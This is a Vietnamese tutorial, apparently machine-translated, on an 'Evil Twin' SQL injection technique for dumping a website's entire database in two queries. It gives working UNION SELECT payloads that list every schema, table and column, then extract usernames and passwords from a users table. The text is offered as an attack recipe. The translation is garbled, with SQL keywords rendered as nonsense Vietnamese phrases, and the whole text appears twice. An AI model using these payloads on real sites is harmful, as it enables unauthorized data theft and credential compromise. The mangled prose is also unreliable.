Trong hướng dẫn này, chúng ta sẽ tìm hiểu làm thế nào để làm được tất cả các dữ liệu vào một trang web trong một cách rất nhanh hơn bằng cách sử dụng ác tiêm đôi SQL.
Trong khi sử dụng SQL injection tay để đổ cơ sở dữ liệu của một trang web đôi khi nó có được thực sự phức tạp hoặc một cơn đau ở mông để có được thông qua các thủ tục dài vì vậy Việc tiêm Evil Twin là những gì bạn cần tại thời điểm đó.
Trước hết hãy để tôi nói cho bạn biết một chút nền tảng tiêm này. Trong khi tôi đang tìm kiếm một cái gì đó để bỏ qua chức năng group_concat 1024 ký tự hạn chế. Tôi tìm thấy một thủ thuật sử dụng thuốc tiêm Subquery. Vâng thatz một cái gì đó cũ.
Nhưng điều này đã cho tôi một ý tưởng để hoàn thành toàn bộ tiêm sử dụng truy vấn con và ở đây tôi tìm thấy các trick để hoàn thành toàn bộ cơ sở dữ liệu lấy chỉ trong hai Ác truy vấn.
Vì vậy, chúng ta sẽ Tiêm Evil hai sau khi các cột bằng cách sử dụng lệnh bằng cách
Ví dụ tiêm của chúng tôi là:
1 'công đoàn chọn 1,2,3,4 #
và chúng tôi đang tiêm chích ở cột thứ 4
Tiếp theo chúng ta sẽ bơm các truy vấn đầu tiên trong tiêm để có được tất cả các tên cơ sở dữ liệu Tiếp theo là các bảng và cột
Các truy vấn sẽ trở thành:
Bây giờ Sau khi Lấy toàn bộ dữ liệu như là đòn thể hiện:
nơi cột đầu tiên là cơ sở dữ liệu danh, thứ hai là Bảng Tên và thứ ba là Tên cột
Vì vậy, đây kiếm thứ hai của chúng tôi là sẵn sàng để được tiêm:
Và các truy vấn trên sẽ cho bạn thấy tất cả các tên người dùng và mật khẩu trong những người sử dụng Bảng.
Cảm ơn đã đọc.
Tôi hy vọng bạn thích nó.
Trong khi sử dụng SQL injection tay để đổ cơ sở dữ liệu của một trang web đôi khi nó có được thực sự phức tạp hoặc một cơn đau ở mông để có được thông qua các thủ tục dài vì vậy Việc tiêm Evil Twin là những gì bạn cần tại thời điểm đó.
Trước hết hãy để tôi nói cho bạn biết một chút nền tảng tiêm này. Trong khi tôi đang tìm kiếm một cái gì đó để bỏ qua chức năng group_concat 1024 ký tự hạn chế. Tôi tìm thấy một thủ thuật sử dụng thuốc tiêm Subquery. Vâng thatz một cái gì đó cũ.
Nhưng điều này đã cho tôi một ý tưởng để hoàn thành toàn bộ tiêm sử dụng truy vấn con và ở đây tôi tìm thấy các trick để hoàn thành toàn bộ cơ sở dữ liệu lấy chỉ trong hai Ác truy vấn.
Vì vậy, chúng ta sẽ Tiêm Evil hai sau khi các cột bằng cách sử dụng lệnh bằng cách
Ví dụ tiêm của chúng tôi là:
1 'công đoàn chọn 1,2,3,4 #
và chúng tôi đang tiêm chích ở cột thứ 4
Tiếp theo chúng ta sẽ bơm các truy vấn đầu tiên trong tiêm để có được tất cả các tên cơ sở dữ liệu Tiếp theo là các bảng và cột
Các truy vấn sẽ trở thành:
-1' union select 1,2,3,(select (@) from (select(@:=0x00),(select (@) from (information_schema.columns) where (table_schema>=@) and (@)in (@:=concat(@,0x3C,0x62,0x72,0x3E,' [ ',table_schema,' ] > ',table_name,' > ',column_name))))a)#
Bây giờ Sau khi Lấy toàn bộ dữ liệu như là đòn thể hiện:
nơi cột đầu tiên là cơ sở dữ liệu danh, thứ hai là Bảng Tên và thứ ba là Tên cột
Vì vậy, đây kiếm thứ hai của chúng tôi là sẵn sàng để được tiêm:
-1' union all select (select (@) from (select(@:=0x00),(select (@) from (users) where (@)in (@:=concat(@,0x3C,0x62,0x72,0x3E,' [ ',username,' ] > ',pass,' > '))))a)#
Và các truy vấn trên sẽ cho bạn thấy tất cả các tên người dùng và mật khẩu trong những người sử dụng Bảng.
Cảm ơn đã đọc.
Tôi hy vọng bạn thích nó.